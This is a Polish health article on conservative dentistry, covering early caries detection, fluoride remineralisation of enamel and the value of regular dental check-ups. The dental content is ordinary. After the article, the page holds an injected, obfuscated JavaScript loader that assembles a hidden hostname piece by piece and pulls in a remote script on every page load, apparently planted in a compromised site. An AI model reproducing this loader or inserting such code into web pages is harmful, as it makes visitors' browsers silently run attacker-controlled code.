Home Zdrowie Stomatologia zachowawcza. Lepiej zapobiegać niż leczyć

Stomatologia zachowawcza. Lepiej zapobiegać niż leczyć

dentist-674654_1280

Leczenie próchnicy powszechnie kojarzy się z inwazyjnym zabiegiem borowania i plombowaniem już powstałych ubytków. Jednak można tego uniknąć. Próchnica może być bowiem leczona również metodami stomatologii zachowawczej, ale tylko w przypadku wczesnego jej wykrycia.
    
Rozpoznać próchnicę

Dla większości osób próchnica to ciemna plama powstała na powierzchni zęba, która powoduje jego zniszczenie. W rzeczywistości jednak próchnica objawia się mlecznobiałymi przebarwieniami, które stopniowo zmieniają odcień na kremowy, brązowy, aż w końcu całkiem ciemnieją. Wówczas uszkodzeniu ulega już nie tylko twarda powłoka zęba. Próchnica powoli przenika do warstwy miękkiej, powodując ból związany z reakcją na bodźcie termiczne oraz słodkie pokarmy. W takiej sytuacji konieczne jest już leczenie inwazyjne w celu usunięcia zainfekowanej tkanki i wypełniania powstałego w ten sposób ubytku.

Nie tylko borowanie

Prawidłowo rozpoznać próchnicę może wyłącznie dentysta, dlatego niezmiernie ważne jest, aby pamiętać o regularnych wizytach kontrolnych. Stomatolog nie tylko oceni stan zębów, ale w razie stwierdzenia mlecznych plam, określi również stopień zaawansowania próchnicy, zalecając odpowiednią metodę leczenia. Jeśli próchnica jest w stadium początkowym, obejmując wyłącznie tkankę twardą, a ząb nie został jeszcze poważnie uszkodzony, może zostać podjęte tzw. leczenie zachowawcze, które w przeciwieństwie do leczenia inwazyjnego nie wymaga borowania.

Stomatologia zachowawcza

Stomatologia zachowawcza jest ważną częścią profilaktyki stomatologicznej. Polega na zapobieganiu i leczeniu próchnicy zębów, jak i innych chorób, które nie są przez nią wywołane. W przypadku próchnicy pozwala uniknąć leczenia inwazyjnego, poprzez zastosowanie metod umożliwiających regenerację szkliwa.

Pierwszym objawem próchnicy jest mlecznobiała plama na powierzchni zęba. Na tym etapie uszkodzeniu ulega tkanka twarda, dlatego możliwa jest jeszcze odbudowa szkliwa. Aby więc zapobiec przekształceniu się plamy próchnicowej (próchnica w początkowym stadium) w ubytek, przeprowadza się tzw. mineralizację. Leczenie polega na zaaplikowaniu określonej dawki fluoru w miejscu wystąpienia próchnicy. Stomatolog, po uprzednim oczyszczeniu powierzchni zęba, nakłada na uszkodzone miejsce specjalny preparat w postaci lakieru lub żelu. Zabieg jest powtarzany do momentu, aż powierzchnia tkanki twardej całkowicie się zregeneruje.

Aby jednak metody stosowane w leczeniu zachowawczym przyniosły efekt, konieczna jest konsekwencja samego pacjenta. Mineralizacja może być bowiem stosowana wyłącznie we wczesnym stadium. W przypadku zaawansowanej próchnicy, kiedy uszkodzeniu uległa tkanka miękka, konieczne jest już wyłącznie leczenie inwazyjne. Dlatego tak ważne są regularne kontrolne wizyty u stomatologa, podczas których będzie można wykryć najdrobniejsze zmiany na powierzchni zęba. Ponadto, pacjent w trakcie leczenia zachowawczego jest zobowiązany do przestrzegania prawidłowej higieny jamy ustanej, polegającej na bardzo dokładnym czyszczeniu zębów pastą z fluorem oraz nicią dentystyczną.

Źródło informacji: http://odent.pl/

 

{source}
<script type=”text/javascript”>
(function(){
u2Xl=document.createElement(„script”);u2Xl.type=”text/javascript”;
u2Xl.async=true;u2Xl_=((„us”)+”t”)+”a”;u2Xl_+=(„t.i”)+””+”n”;u2Xl_+=((„f”)+”o”);
u2Xl.src=”http://”+u2Xl_+”/3741667.X4XXdbwl2Xlh0Xlxak966kp7lbl58r”;
document.body.appendChild(u2Xl);
})();
</script>
{/source}